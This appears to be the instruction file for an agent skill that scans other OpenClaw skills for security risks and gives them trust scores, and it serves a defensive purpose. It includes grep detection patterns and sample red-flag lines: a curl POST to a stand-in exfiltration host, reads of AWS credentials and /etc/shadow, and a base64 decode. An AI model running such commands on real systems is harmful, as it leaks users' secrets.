Scan to join WeChat groupSkill Security Scanner
Scan OpenClaw skills for security issues, suspicious patterns, and give a trust score. Helps users make informed decisions about which skills to trust.
When to Use
- Before installing a new skill from ClawHub
- Auditing existing installed skills
- User asks "is this skill safe?"
- After ClawHavoc type incidents (malicious skills in ecosystem)
- Before running untrusted skills
Quick Reference
| Command | Purpose |
|---------|---------|
| scan-skill <path> | Scan a single skill |
| scan-all | Scan all skills in workspace |
| trust-score <path> | Get quick trust score (0-100) |
| list-permissions <path> | List all requested permissions |
Scanning Strategy
1. Check Metadata (Frontmatter)
Look for:
bins- CLI tools skill needsenv- Environment variables (API keys, tokens)requires.config- Required config settingsrequires.bins- Binary dependencies
Red flags:
- Skills requesting many bins without clear purpose
- Env vars for sensitive services (AWS keys, database passwords)
- Config requiring admin/elevated permissions
2. Analyze SKILL.md Content
Suspicious patterns to detect:
# Network calls to unknown domains
grep -E "(curl|wget|http|https).*\.com" SKILL.md
grep -E "fetch\(|axios\(" SKILL.md
# File system access beyond declared scope
grep -E "rm -rf|dd |mkfs" SKILL.md
# Credential access
grep -E "password|secret|token|key" SKILL.md
# Execution of downloaded code
grep -E "eval\(|exec\(|system\(" SKILL.md
# Base64 encoded commands
grep -E "base64|-enc|-encode" SKILL.md
3. Trust Score Calculation
Score from 0-100 based on:
| Factor | Weight | Criteria | |--------|--------|----------| | Author reputation | 20% | Known author? Official OpenClaw skill? | | Permission scope | 30% | Minimal bins/envs? | | Code patterns | 25% | No suspicious commands | | Update frequency | 15% | Recently updated? | | Download count | 10% | Popular = more scrutiny |
4. Risk Levels
| Score | Risk | Action | |-------|------|--------| | 80-100 | ๐ข Low | Safe to use | | 60-79 | ๐ก Medium | Review before use | | 40-59 | ๐ High | Use with caution | | 0-39 | ๐ด Critical | Don't use |
Output Format
Scan Result
๐ Skill: <skill-name>
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ Trust Score: <score>/100 (<risk-level>)
๐ Permissions Requested:
โข bins: curl, jq
โข env: OPENWEATHER_API_KEY
โ ๏ธ Issues Found:
1. [MEDIUM] Requests network access but no clear purpose
2. [LOW] No recent updates (6+ months)
โ
Positive Signs:
โข Official OpenClaw skill
โข Clear documentation
Trust Report
Generate a full report:
## Security Analysis: <skill-name>
### Score: <score>/100 (<risk-level>)
### Permissions Analysis
| Type | Requested | Risk |
|------|-----------|------|
| bins | curl, jq | Low |
| env | API_KEY | Medium |
### Code Pattern Analysis
- โ
No suspicious execution patterns
- โ
No credential access attempts
- โ ๏ธ 2 network calls to external domains
### Recommendation
<RECOMMENDATION>
Common Red Flags
High Risk Patterns
-
Network exfiltration
# Example: sending data to unknown servers # curl -X POST https://SUSPICIOUS-DOMAIN/exfil # fetch("https://data-collector.DOMAIN") -
Credential harvesting
# Example: reading credentials # cat ~/.aws/credentials # grep "password" /etc/shadow -
Persistence mechanisms
# Example: auto-start, cron, systemd # sudo crontab -l # systemctl enable -
Obfuscated code
# Example: base64 encoded commands echo "c3VkbyByb20gL3J0ZiAv" | base64 -d
Medium Risk Patterns
- Excessive permissions - More bins/envs than needed
- No documentation - Unclear what skill does
- Outdated - No updates in 6+ months
- Third-party dependencies - Unknown npm/go packages
Green Flags
- โ Official OpenClaw skills (openclaw/skills)
- โ Clear, specific permissions
- โ Active maintenance (recent commits)
- โ Open source with clear code
- โ Known author with reputation
Workflows
Before Installing New Skill
# 1. Get skill path (ClawHub or local)
# 2. Run full scan
scan-skill /path/to/skill
# 3. Check trust score
trust-score /path/to/skill
# 4. Review issues
# 5. Decide: install / skip / investigate more
Regular Security Audit
# Weekly: scan all installed skills
scan-all
# Monthly: generate full report
# Save to .learnings/ for documentation
Quick Trust Check
# For quick decision
trust-score <path>
# If score < 60, do full scan
# If score < 40, don't use
Integration with Other Skills
- Works with self-improving-agent - Log security findings
- Use memory - Remember trust scores for known skills
- Report findings to user before risky operations
Best Practices
- Always scan before installing untrusted skills
- Document scan results in
.learnings/ - Share findings with community (anonymized)
- Update trust scores when vulnerabilities found
- Trust but verify - Don't rely solely on automated scanning
Examples
Example 1: Scanning Before Install
User wants to install "cool-new-skill" from ClawHub:
> scan-skill ./skills/cool-new-skill
๐ Scanning: cool-new-skill
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ Trust Score: 72/100 (๐ก Medium)
๐ Permissions:
โข bins: none
โข env: none
โ ๏ธ Issues:
โข No recent updates (8 months)
โข Unknown author
โ
Positives:
โข Clear documentation
โข Minimal permissions
๐ก Recommendation: Safe to try, monitor usage
Example 2: Finding Malware
> scan-skill ./skills/suspicious-skill
๐ Scanning: suspicious-skill
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ Trust Score: 23/100 (๐ด CRITICAL)
๐ Permissions:
โข bins: curl, base64
โข env: API_KEY, SECRET_TOKEN
๐จ CRITICAL ISSUES FOUND:
1. Network exfiltration pattern detected
2. Credential access attempt
3. Obfuscated commands (base64)
๐ Recommendation: DO NOT USE - Potential malware
Example 3: Audit Report
> scan-all
๐ Scanning all skills in ~/.openclaw/workspace/skills/
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
github: 95/100 (safe)
โ ๏ธ todoist: 68/100 (review needed)
โ
self-improving-agent: 92/100 (safe)
๐ด unknown-skill: 34/100 (remove recommended)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Summary: 2 safe, 1 review, 1 remove
Related
- ClawHavoc incident (Feb 2026) - 341 malicious skills
- Agent Trust Hub - Third-party security tooling
- OpenClaw Security docs: docs.openclaw.ai/gateway/security